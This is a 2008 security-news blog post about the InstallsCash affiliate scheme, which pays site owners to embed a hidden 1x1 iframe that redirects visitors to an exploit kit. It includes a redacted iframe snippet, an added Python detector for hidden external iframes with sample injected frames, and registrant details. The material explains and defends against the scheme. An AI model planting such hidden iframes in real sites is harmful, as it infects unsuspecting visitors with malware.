CyberInsecure.com

Daily cyber threats and internet security news: network security, online safety and latest security alerts
March 31st, 2008

Infect Your Own Website Visitors For Russian Cash

The InstallsCash partnership program invites affiliates to place a short, one-line iframe on their website pages. This hidden iframe silently redirects every visitor to another website, where an MPack-like exploit process installs the program's payload. Each successful installation originating from an affiliate's site earns that affiliate a payment.

To cover their tracks, the InstallsCash registrar is, of course, in China (bizcn.com). The fake registrant address is in the US (Iowa City) and the e-mail contact is a free webmail service popular in Russia (ydwrtyxamz_at_mail.ru). Obviously, this account name was chosen at random.

Subscribers to this “program” are offered a list of accepted payment systems, the usual ones used by online criminals. Having chosen one, the subscriber is asked to wait 24 hours for account activation.

After this period a subscriber will receive the IFRAME code, something like:

<iframe src="http://**************610.php" width=1 height=1></iframe>

The iframe has to be hidden on the subscriber’s website and point to another website with a strange, randomly chosen name that appears to be generated more or less automatically. The affiliator seems to create or use a different one for each affiliate. Thanks to these unique names, the software can recognize each affiliate: the loads are fed into their stats page, from which the payments are calculated.

Basically, subscribers are paid for unique loads of the InstallsCash IFRAME, which means that whoever signs up for InstallsCash and installs their code is infecting and redirecting the visitors of his own website through this invisible iframe.
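A site owner or scanner can look for exactly this pattern: an iframe that is invisible to the visitor (1x1, zero-size or display:none) and that loads content from a host other than the site's own. The following is an added example, not code from the original post or from any of the parties it describes; the sample HTML and the affiliate-redirect.invalid domain are constructed for illustration.

```python
"""
Detect hidden iframes of the kind InstallsCash affiliates are paid to embed:
tiny or display:none frames that load a page from a domain other than the
site's own. Added example; the sample HTML below is constructed.
"""
from html.parser import HTMLParser
import re
from urllib.parse import urlparse

# Dimension (in px) below which an iframe is effectively invisible to a visitor.
TINY = 2


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # Boolean attributes arrive with value None; normalise to "".
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(value):
    """Parse width/height attribute values such as '1', '1px' or '0'; None if absent."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def is_hidden(attrs):
    """True when the iframe's attributes make it invisible to a human visitor."""
    w = _dimension(attrs.get("width"))
    h = _dimension(attrs.get("height"))
    if w is not None and h is not None and (w < TINY or h < TINY):
        return True
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    if "display:none" in style or "visibility:hidden" in style:
        return True
    # An inline style can shrink the frame just as well (style="width:1px;height:1px").
    sw = re.search(r"width:(\d+)", style)
    sh = re.search(r"height:(\d+)", style)
    if sw and sh and (int(sw.group(1)) < TINY or int(sh.group(1)) < TINY):
        return True
    return False


def is_external(src, own_host):
    """True when the iframe's src points at a host other than the site's own."""
    parsed = urlparse(src)
    if not parsed.scheme or not parsed.netloc:
        return False  # relative src: same site
    host = parsed.hostname or ""
    return host != own_host and not host.endswith("." + own_host)


def find_suspicious_iframes(html, own_host):
    """Return the src of every iframe that is both hidden and external."""
    collector = IframeCollector()
    collector.feed(html)
    return [
        f.get("src", "")
        for f in collector.iframes
        if is_hidden(f) and is_external(f.get("src", ""), own_host)
    ]


# Constructed sample page: one legitimate embed, two injected affiliate-style
# frames (one 1x1, one display:none) and one hidden but local frame.
SAMPLE_HTML = """
<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example.com/video" width="640" height="360"></iframe>
<iframe src="http://affiliate-redirect.invalid/610.php" width=1 height=1></iframe>
<iframe src="http://affiliate-redirect.invalid/xyz.php" style="display:none"></iframe>
<iframe src="/local/widget.html" width=1 height=1></iframe>
</body></html>
"""


def scan_sample():
    """Run the check over the constructed page as if it were www.example.com."""
    return find_suspicious_iframes(SAMPLE_HTML, "www.example.com")


if __name__ == "__main__":
    for src in scan_sample():
        print("hidden external iframe:", src)
```

Hidden-but-local frames are deliberately not reported, since legitimate sites use them for tracking pixels and widgets; the combination of invisibility and an unfamiliar external host is what distinguishes an injected affiliate iframe. Run the scanner over a crawl of your own pages and treat any new external host it reports as something to verify against your change history.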

The InstallsCash distributor admits and warns: “…they will be updating every 3 days and they will be invisible for every antivirus!”

The registrar is bizcn.com, and the registrant contact came with another random e-mail address:

Jan Dendinger ycsmmiqtyo_at_mail.ru
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581
us

It seems that the same people are behind InstallsCash, IframeCash (September 2006) and IframeDollars (November 2007). In November 2007, the RBNExploit blog discussed that iFrameCash and iFrameDollars were possibly linked to the Russian Business Network. This confirms that RBN trading partners are still in business.

McAfee VirusScan blocks and detects the PHP script as JS/Exploit-BO.gen. Some additional files are detected as Downloader-BDH.


One Response to “Infect Your Own Website Visitors For Russian Cash”

1. PPI Iframe-EXploit MPack INSTALLSCASH russian cash – Black Hat Forum Says:
April 3rd, 2008 at 7:14 am

[…] http://www.installscash.com Interesting articles about the company and how it works, you can find here: https://cyberinsecure.com/infect-your…-russian-cash/ http://www.avertlabs.com/research/blog/index.php/category/data-theft/ (above middle of the blog) […]
